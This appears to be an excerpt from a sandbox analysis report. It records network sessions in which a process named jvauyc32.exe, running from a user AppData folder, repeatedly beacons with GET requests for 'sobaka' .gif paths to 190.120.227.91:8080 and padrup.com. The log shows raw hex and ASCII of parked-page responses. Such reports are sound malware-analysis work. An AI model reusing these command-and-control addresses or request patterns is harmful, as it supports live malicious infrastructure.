                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.726022005 CEST167OUTGET /sobakavolos.gif?18a856f=77566029 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          9192.168.2.949725185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:06.535890102 CEST155OUTGET /sobaka1.gif?20c2a09=309164625 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602833033 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:07 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OnIWNNV3X+66n8LSEbyblsckm0svhDZBGDjaSm9Ltc7DucuRlpjakYC5JjLY8aeWnlE1wNL1Z8m1fKymup5gSQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602885962 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEyNy4yMzY4OjE3YzcyOWJhZDk5Y2VmOWM4NGY3MTdmNjViYTdjN2U4ODE0YWM1MDQ3ZGVmOGMzMWRhZmU0MGJhZGY4MGIzOTE6NjcxMjNiN2YzOWQwYw==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.602900028 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          10192.168.2.949726190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:07.652932882 CEST168OUTGET /sobakavolos.gif?22aca7d=145435124 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          11192.168.2.949727185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.168298960 CEST155OUTGET /sobaka1.gif?2a61d79=222204765 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239604950 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:13 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_n+rvnpoWDroweTYFuey9nviPnJvFuxFYouUD5bCKDc0Ot+jOBltLrwknr/uWekwOifL+mb3phwEM1UQrO6W0Hg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239654064 CEST212INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEzMi44ODYxOjA3MGQwNThjNTg2YTg1MGUwNjdiNjAzZGMyYjU1NGNjZTU2NTQzOTkyYzgxMjYzY2QwNTMzYTY2YmZ
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239662886 CEST1236INData Raw: 6d 59 32 56 68 5a 57 49 36 4e 6a 63 78 4d 6a 4e 69 4f 44 52 6b 4f 44 55 32 4f 51 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72
                                                                                                                                                                                                                                                                                          Data Ascii: mY2VhZWI6NjcxMjNiODRkODU2OQ==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.239674091 CEST552INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123b85&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '7c1b7a6011abeaa3fefb06cb1dbc7dd361467c83048');</script><s


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          12192.168.2.949728190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.298513889 CEST167OUTGET /sobakavolos.gif?2c5425f=92964030 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          13192.168.2.949729185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.541049004 CEST154OUTGET /sobaka1.gif?333df63=53731171 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602365971 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:18 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_BiNqxWuKcfCoBvcim8uYs5ni2qblGXs003+2bMBi+R8WMI1rM1ORtyWFlvqNxvRM1rEQ7xCmlvI9g3X3Fz2EdQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602384090 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEzOC4yNjIzOjY5NWJlZDM4NjYzZTI3ODk4MTlhYjdlZDEzYWViZjcxZjZmMDQ4MGJmMzhjNmQ0YmUw6f9NGFkMmVhNTY0OWI4MDU6NjcxMjNiOGE0MDA
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602488995 CEST424INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602500916 CEST340INData Raw: 35 35 39 34 30 31 33 61 62 34 34 37 66 33 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 5594013ab447f3');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          14192.168.2.949730190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.621656895 CEST168OUTGET /sobakavolos.gif?352e846=390355434 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          15192.168.2.949731185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.451464891 CEST155OUTGET /sobaka1.gif?3d3b9b1=192621843 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726543903 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:24 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_f9Iiz4upIrRuYENXmsH3tjU9PQfJov+YPoVdTtGyRHpNSmE6fb5auFieZCI0ADUrfisnDpaPF9MrBGHo77kfqQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726589918 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE0NC4wMjAzOjg2YmU4YWFiNDhiYzkxMzE1ZjBhYTIwYmQ3ZDdkNDJlYWYyZTU0YzQwNzlkYTgyZWU4YjBhOTdmYzU0OWVkYzY6NjcxMjNiOTAwNGYzNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726600885 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726605892 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 37 61 62 62 34 33 34 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 1467abb434');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h
